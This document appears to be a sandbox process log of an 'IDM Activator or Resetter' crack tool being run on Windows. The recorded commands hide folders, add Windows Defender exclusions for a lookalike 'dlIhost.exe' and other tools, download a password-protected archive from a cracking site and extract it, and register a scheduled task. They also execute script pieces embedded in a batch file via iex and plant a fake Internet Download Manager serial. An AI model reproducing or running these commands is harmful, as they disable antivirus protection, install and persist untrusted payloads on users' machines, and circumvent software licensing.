"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.0.551583416\1589057045" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1092 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1fd3bc3-22e9-4c7c-b821-bc6fa97fd139} 644 "\\.\pipe\gecko-crash-server-pipe.644" 1284 105f9058 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.1.2104602082\505889130" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21610 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eabab67d-0a52-47a3-bb58-cebed462a591} 644 "\\.\pipe\gecko-crash-server-pipe.644" 1564 f4eb258 socket

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.2.827980771\1027120691" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21648 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ca4cc2-bd3c-4c8b-b564-007f2870b2ea} 644 "\\.\pipe\gecko-crash-server-pipe.644" 2000 18974b58 tab

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.3.1001450690\1901238302" -childID 2 -isForBrowser -prefsHandle 2680 -prefMapHandle 2676 -prefsLen 26046 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {582281e5-7dde-4a98-9dfa-83d369eb85bc} 644 "\\.\pipe\gecko-crash-server-pipe.644" 2696 d61658 tab

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.4.1946641119\166678601" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3548 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1798b114-7621-4d53-be93-528db96602b6} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3700 1fe63058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.5.1560452423\30358125" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {564b8f2c-1a91-4cc5-b5a6-595861e02dc0} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3788 1fe62a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.6.16405718\1781117987" -childID 5 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26170 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3976f00-f5aa-41c6-90e0-8137e667e057} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3952 1fe63358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="644.7.723266685\659558384" -childID 6 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26251 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ff7eef3-2f29-42d2-bfb5-baace18a2f3a} 644 "\\.\pipe\gecko-crash-server-pipe.644" 3852 2049a258 tab

C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe

"C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" -Embedding

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe

"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe

"C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe" "C:\Program Files (x86)\Internet Download Manager\IDMMsgHostMoz.json" [email protected]

C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe

"C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe" "C:\Program Files (x86)\Internet Download Manager\IDMMsgHostMoz.json" [email protected]

C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe

"C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "

C:\Windows\SysWOW64\attrib.exe

ATTRIB -S +H .

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"

C:\Windows\SysWOW64\find.exe

FIND /I "1"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"

C:\Windows\SysWOW64\find.exe

FIND /I "x86"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "IDM.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\reg.exe

reg query HKCU\Console /v QuickEdit

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"

C:\Windows\System32\reg.exe

reg query HKU\\Software

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\System32\reg.exe

reg add HKCU\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath

C:\Windows\System32\reg.exe

reg add HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.crackingcity.com/VScan/dlIhost.7z', 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 1 internetdownloadmanager.com

C:\Windows\System32\PING.EXE

ping -n 1 internetdownloadmanager.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-023017622.reg"

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $toggle = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$key = -join ((Get-Random -Count 20 -InputObject ([char[]]('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'))));$key = ($key.Substring(0, 5) + '-' + $key.Substring(5, 5) + '-' + $key.Substring(10, 5) + '-' + $key.Substring(15, 5) + $key.Substring(20));Write-Output $key"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v FName /t REG_SZ /d "9906"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v LName /t REG_SZ /d "10777"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v Email /t REG_SZ /d "[email protected]"

C:\Windows\System32\reg.exe

reg add HKCU\SOFTWARE\DownloadManager /v Serial /t REG_SZ /d "XBA9T-Q7R81-CG6UO-NVDY4"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/images/idm_box_min.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe

"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/register/IDMlib/images/idman_logos.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/pictures/idm_about.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\System32\timeout.exe

timeout /t 3

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM Activation process has been completed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Darkgray"' -fore '"white"' '"If the fake serial screen appears, use the Freeze Trial option instead."'

C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe

NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 1 internetdownloadmanager.com

C:\Windows\System32\PING.EXE

ping -n 1 internetdownloadmanager.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-023035952.reg"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "FName" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LName" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "Email" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "Serial" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "ptrk_scdt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f

